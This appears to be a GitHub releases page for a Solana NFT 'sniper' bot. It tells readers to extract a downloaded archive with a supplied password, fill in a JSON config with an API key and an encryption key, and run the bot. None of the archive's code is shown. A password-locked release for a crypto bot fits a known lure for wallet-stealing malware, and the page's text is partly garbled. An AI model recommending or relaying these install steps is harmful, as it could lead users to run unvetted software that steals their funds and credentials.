Releases: kansel-dev/solana-nft-sniper
Releases · kansel-dev/solana-nft-sniper
Release list
release
- Clone the repository and follow the step-by-step setup guide in the documentation.
- Extract archive with password
Gn2qVdUt Customize the bot's configurationto match your sniping strategy and preferences.tensorApisection includes information needed for Tensor Marketplace integration, such as the API base URL and an API key.snipingAlgorithmsection contains parameters for the smart sniping algorithm, including precision thresholds, bidding strategy, and discount thresholds.userInterfacesection includes settings for the program interface, such as enabling visual indicators and logs history.securitysection includes security-related settings, like two-factor authentication and encryption key.- Run the bot
{
"tensorApi": {
"baseUrl": "https://tensor-marketplace-api.com",
"apiKey": "your-api-key-here"
},
"snipingAlgorithm": {
"precisionThreshold": 0.95,
"bidStrategy": "automated",
"discountThresholds": [3, 10, 20]
},
"userInterface": {
"visualIndicators": true,
"logsHistory": true
},
"security": {
"twoFactorAuthentication": true,
"encryptionKey": "your-encryption-key"
}
}